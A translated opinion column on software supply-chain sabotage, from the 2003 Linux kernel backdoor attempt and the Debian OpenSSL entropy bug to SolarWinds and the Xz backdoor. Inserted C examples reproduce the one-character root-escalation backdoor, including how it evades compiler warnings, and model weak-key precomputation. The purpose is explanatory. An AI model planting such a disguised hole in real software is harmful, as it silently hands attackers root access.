

Xz, Solarwinds and the coming Armageddon

Warning: this post was created 3 months ago.

This text was automatically translated from Italian. If you appreciate our work and like reading it in your language, consider a donation so that we can keep doing it and improving it.

The articles of Cassandra Crossing are published under the CC BY-SA 4.0 license | Cassandra Crossing is a column created by Marco Calamari under the nom de plume of Cassandra, born in 2005.

After the foiled sabotage of the Xz library, are we safe?

This article was written on April 5, 2024 by Cassandra

Cassandra Crossing 582/ Xz, Solarwinds and the coming Armageddon

The sabotage of the Xz library was foiled, and once again the good guys won. But are we sure that attacks on the software supply chain have not succeeded elsewhere without anyone noticing?

Reality forces Cassandra to extend the "End of the World" series yet again, because new and very serious clues are emerging that the weapons for the coming IT Armageddon continue to pile up.

And once again, gusts of optimism, voiced even by professionals, spread in a way that is as inexplicable as it is dangerous. Certainly not out of stupidity or incompetence; perhaps out of a desire for a quiet life, perhaps out of unjustified optimism.

But in order to state her thesis fully and comprehensibly, Cassandra is, as usual, forced to rewind the tape and tell a bit of background.

Luckily we only need to rewind to 2003, the year of the attempt to introduce a backdoor into the Linux kernel itself.

An administrator of the official source repository noticed that a minimal modification to a trivial kernel routine did not appear to have been requested by anyone. Cassandra does not assume that C is part of her readers' background, but just to show how diabolical the modification was: it is the change of a single character on a single line, that is, from

if ( (options == (__WCLONE|__WALL)) && (current->uid == 0))

to

if ( (options == (__WCLONE|__WALL)) && (current->uid = 0))

The missing second "=" turns the comparison into an assignment: instead of checking whether the caller is root, the condition sets the caller's uid to 0 (and, since that assignment evaluates to 0, the branch is never taken and no error is ever reported). Any user who called the wait4() system call with that particular combination of option flags (__WCLONE together with __WALL) would therefore have found himself "promoted" to root, and could have taken complete control of the server.
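To make the mechanism concrete, here is a user-space model of the two versions of that check. This is an added example, not the article's or the kernel's code: `struct task` stands in for the kernel's `current`, the function names are stand-ins, and only the flag values are the real ones from the Linux headers. It also shows the detail that made the change so hard to spot: because the assignment sits inside its own parentheses, gcc's -Wparentheses warning about an "assignment used as truth value" stays silent.

```c
/* Added example (not the article's or the kernel's code): a user-space model
 * of the 2003 wait4() check in its correct and backdoored forms. `struct task`
 * stands in for the kernel's `current`, and the function names are
 * stand-ins; the flag values are the real ones from the Linux headers. */
#include <stdio.h>

#ifndef __WALL
#define __WALL   0x40000000
#endif
#ifndef __WCLONE
#define __WCLONE 0x80000000
#endif
#define K_EINVAL 22          /* kernel errno value for EINVAL */

struct task {
    unsigned int uid;        /* the only field that matters here */
};

/* Correct form: a comparison. Only a root caller using this odd flag
 * combination gets -EINVAL; nobody's credentials change. */
int wait4_check_correct(unsigned int options, struct task *current)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -K_EINVAL;
    return retval;
}

/* Backdoored form: one '=' less. (current->uid = 0) stores 0 into uid and
 * evaluates to 0, so the condition is false, retval stays 0, and the
 * caller walks away as root with no error to give the game away. Because
 * the assignment sits inside its own parentheses, gcc -Wall does not warn
 * about "assignment used as truth value". */
int wait4_check_backdoored(unsigned int options, struct task *current)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -K_EINVAL;
    return retval;
}

/* Runs both variants for the same caller and returns the uid left behind
 * by the backdoored one (0 means the caller was promoted to root). */
unsigned int demo_escalation(unsigned int options, unsigned int start_uid)
{
    struct task t = { .uid = start_uid };
    int r_ok = wait4_check_correct(options, &t);
    unsigned int uid_ok = t.uid;
    int r_bd = wait4_check_backdoored(options, &t);
    printf("options=0x%08x, caller uid=%u\n", options, start_uid);
    printf("  correct    : retval=%d uid=%u\n", r_ok, uid_ok);
    printf("  backdoored : retval=%d uid=%u%s\n", r_bd, t.uid,
           (t.uid == 0 && start_uid != 0) ? "  <-- silently promoted to root" : "");
    return t.uid;
}

int main(void)
{
    demo_escalation(__WCLONE | __WALL, 1000); /* the trigger: uid becomes 0  */
    demo_escalation(__WALL, 1000);            /* any other flags: untouched */
    return 0;
}
```

Compile it with `gcc -Wall` and note that neither variant produces a warning: the compiler is no help here, and the change was in fact caught not by tooling on the code but by noticing that the repository contained a change nobody had submitted.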

The change was rolled back, the build server infrastructure was scrapped and rebuilt from scratch, and the source was reloaded from a backup.

Good 1, Bad 0.

But fast forward to 2006 to find yet another diabolical change, this time in the OpenSSL library as packaged by Debian. Two lines commented out dramatically reduced the entropy of the library's random number generator. To keep it simple here too: they ensured that, for example, the number of different cryptographic keys the library could generate on an affected system dropped from a practically infinite value to 32767 (one per possible process id, for each key type and size). Anyone who knew this fact and had pre-calculated the appropriate keys could have broken, with extreme ease, any key generated by that OpenSSL: SSH keys, TLS certificates and whatever else used it (i.e. practically everything).

When the problem was discovered (in May 2008) and promptly fixed, its effects did not cease immediately. In fact it took more than two years for the majority of the "weak" keys generated and spread across the internet to be replaced, which left the perpetrators a further two years to take advantage of its effects.
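To see why commenting out those lines collapses the keyspace, and how the cleanup worked, here is a toy model. It is an added example, not the article's, Debian's or OpenSSL's code: the pool, the mixing step, the function names and the 64-bit "keys" are inventions for illustration. The weak rand_add ignores the entropy it is handed, which is exactly what removing the MD_Update(&m, buf, j) call did, so the only thing left in the pool is the process id; the table built from all 32767 pids is the same idea as the openssl-blacklist package Debian shipped to detect weak keys.

```c
/* Added example (not the article's, Debian's or OpenSSL's code): a toy
 * model of an entropy pool whose rand_add() stirs in either everything it
 * is given (correct) or nothing (the 2006 Debian change), plus the
 * precomputed table that turns the weak case into a lookup. Names, the
 * mixing step and the 64-bit "keys" are stand-ins for illustration. */
#include <stdint.h>
#include <stdio.h>

#define PID_MAX 32767u   /* default Linux pid range at the time: 1..32767 */

struct pool { uint64_t state; };

/* SplitMix64-style scrambling step: a toy mixer, NOT a cryptographic RNG.
 * It is a bijection on 64-bit values, so distinct inputs give distinct
 * outputs; that is what makes the weak keys below all distinct. */
static uint64_t mix64(uint64_t z)
{
    z += 0x9e3779b97f4a7c15ULL;
    z = (z ^ (z >> 30)) * 0xbf58476d1ce4e5b9ULL;
    z = (z ^ (z >> 27)) * 0x94d049bb133111ebULL;
    return z ^ (z >> 31);
}

/* Correct rand_add: every byte of caller-supplied entropy is mixed in. */
void rand_add_correct(struct pool *p, const unsigned char *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        p->state = mix64(p->state ^ buf[i]);
}

/* Debian's rand_add: the one line that used the buffer is gone, so the
 * caller's entropy never reaches the pool. */
void rand_add_weak(struct pool *p, const unsigned char *buf, size_t n)
{
    (void)buf; (void)n;          /* MD_Update(&m, buf, j) commented out */
    p->state = mix64(p->state);  /* the pool is stirred, with nothing new */
}

typedef void (*rand_add_fn)(struct pool *, const unsigned char *, size_t);

/* Key generation as an application sees it: the pool starts from the pid
 * (which OpenSSL always mixed in), entropy is added, one key is drawn. */
uint64_t generate_key(rand_add_fn add, uint32_t pid,
                      const unsigned char *entropy, size_t n)
{
    struct pool p = { .state = pid };
    add(&p, entropy, n);
    return mix64(p.state);
}

/* Every key the weak generator can ever produce, indexed by pid. */
static uint64_t weak_table[PID_MAX + 1];

void build_weak_table(void)
{
    for (uint32_t pid = 1; pid <= PID_MAX; pid++)
        weak_table[pid] = generate_key(rand_add_weak, pid, NULL, 0);
}

/* Blacklist check: the pid that produced the key, or 0 if it is not weak. */
uint32_t lookup_weak_key(uint64_t key)
{
    for (uint32_t pid = 1; pid <= PID_MAX; pid++)
        if (weak_table[pid] == key)
            return pid;
    return 0;
}

int main(void)
{
    /* Constructed "entropy" from two different machines. */
    unsigned char e1[16], e2[16];
    for (int i = 0; i < 16; i++) {
        e1[i] = (unsigned char)(i * 7);
        e2[i] = (unsigned char)(200 - i);
    }

    uint64_t w1 = generate_key(rand_add_weak, 4242, e1, sizeof e1);
    uint64_t w2 = generate_key(rand_add_weak, 4242, e2, sizeof e2);
    uint64_t c1 = generate_key(rand_add_correct, 4242, e1, sizeof e1);
    uint64_t c2 = generate_key(rand_add_correct, 4242, e2, sizeof e2);
    printf("weak,    pid 4242, entropy A: %016llx\n", (unsigned long long)w1);
    printf("weak,    pid 4242, entropy B: %016llx  (same: entropy ignored)\n",
           (unsigned long long)w2);
    printf("correct, pid 4242, entropy A: %016llx\n", (unsigned long long)c1);
    printf("correct, pid 4242, entropy B: %016llx\n", (unsigned long long)c2);

    build_weak_table();
    printf("weak key found in table: pid %u\n", lookup_weak_key(w1));
    printf("correct key in table:    pid %u (0 = not weak)\n", lookup_weak_key(c1));
    return 0;
}
```

The point of the table is the asymmetry the article describes: the victim needs to find and replace every weak key, while the attacker needs only a one-off computation of 32767 candidates per key type to recognise, and then forge or decrypt with, any of them.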

The event struck the chroniclers of the time so much that even XKCD dedicated a witty cartoon to it.

But let's move on, because unfortunately there is nothing to laugh about.

There were those who said Good 2 - Bad 0, and ball back at the centre.

We will talk about how this score is calculated, which is the crux of Cassandra's reasoning, at the end of this piece.

Fast forward to 2020: a group of cyber criminals in the pay of a nation state attacks the network of an IT management software vendor, probably as early as 2018. Once inside, they alter the servers that compile the software destined for customers, so that the shipped builds include a backdoor.

We are not talking about just any software: SolarWinds Orion is a sophisticated network and infrastructure monitoring platform, installed by the largest organizations with stringent security requirements, including, for example, around twenty American government agencies, defence contractors, large IT companies and private companies. Yes, in Italy too.

SolarWinds' automatic update had therefore installed a backdoor that made it very easy to break into the networks that used it; in this way thousands of well-protected networks were suddenly opened to the attackers, who could abuse them at will for months. When the attack was discovered (because that is what it was), the main problem for the affected organizations was to understand whether they had been breached or not, because the attackers were of the most dangerous kind, the skilled ones, who do not get caught and are very hard to find and evict.

And finally we arrive at 2024, today, or rather barely a week ago, and the attack on the Xz library.

A Microsoft employee (a PostgreSQL developer, as it happens) notices that SSH logins on a test machine take about 500 milliseconds longer than with the previous version of the system. Since he evidently had nothing better to do in life and considered the problem important, he starts digging to find the reason. To his amazement he finds that the overhead comes from liblzma, the Xz compression library, which sshd loads indirectly (through libsystemd, on the distributions that patch OpenSSH that way) and which, in its new version, hooks into the signature checks sshd performs with OpenSSL (yes, OpenSSL again). Xz is the library responsible for compressing and decompressing .xz files; yes, the very one used to pack software packages and tarballs, whether you know it or not. Worse still, the malicious part was not even in the readable source: it was hidden inside a binary "test" file that the build system extracted and linked in during compilation.

He realizes with horror that this modification allows whoever holds a specific private key to send commands to the machine through the SSH port, before any authentication, and have them executed as root; and from there anything can happen, from taking complete control of the system to quickly and completely destroying every compromised server.

Retrospective analysis of events revealed that, about two years earlier, a developer with no verifiable identity had begun proposing changes to the Xz library, which were reasonable and therefore accepted by its maintainer, and had then been accepted as co-maintainer of the library itself. He had then slowly subverted the library's build system, inserting the malicious code destined to end up inside sshd, while at the same time carrying out a sophisticated social engineering campaign against those who could have reviewed his changes, so that those reviews never happened.

Then, when the infected library began to spread to the first servers, one of them was that of the blessed Microsoft employee with plenty of free time, whom we can never thank enough and who deserves a monument.

If this brief summary is not enough for you, you can have fun listening to this podcast, in which two titans of the Italian hacker scene of the 90s discuss the matter in depth and with humour, while also sharing an optimistic opinion about the future.

So Good 3 - Bad 0, and ball back at the centre?

Well, this is the assessment that accompanied these terrifying events, which luckily always came to light, and before they could cause catastrophic damage. Actually, SolarWinds did cause very significant economic damage, plus damage from data theft and unspecified espionage activity, but it should at least have pushed the global IT community to take action against this new type of cyber attack.

So Good 4 — Bad 0??

And so we come to the conclusions, probably already very clear to Cassandra's 24 well-informed readers.

By all the deities ever worshipped by humans, from Astarte to Zarathustra, Manitou, Cthulhu and Yog-Sothoth included: is it possible that nobody thinks of all the attacks of this magnitude that have never been detected? The ones no sleepless employee stumbled upon, that no curious system administrator ever noticed?

But are there really experts who believe that the good guys continue to score and that the bad guys are forced into their half of the pitch?

Can anyone really think that nation states, arms manufacturers, criminal groups large and small, and mafias are not accumulating, in arsenals large and small, these "modifications" to the software that makes the world run, these cyber weapons that have sometimes even been tested or used on a smaller scale or with limited consequences? (Do the names SQL Slammer and Stuxnet mean anything to you?)

Cassandra has always been Andreottian at heart (thinking ill of others is a sin, but one usually guesses right), and never more than in this case does she feel the duty to invite the optimists to reconsider their positions, not out of a precautionary principle but out of pure and simple realism.

The Armageddon of the first world cyber war is certainly, and I repeat certainly, at an advanced stage of preparation. Don't say afterwards that I didn't warn you.

Marco Calamari

Write to Cassandra — Twitter — Mastodon
Video column “A chat with Cassandra”
Cassandra's Slog (Static Blog).
Cassandra's archive: school, training and thought







By skariko

Author and administrator of the web project The Alternatives
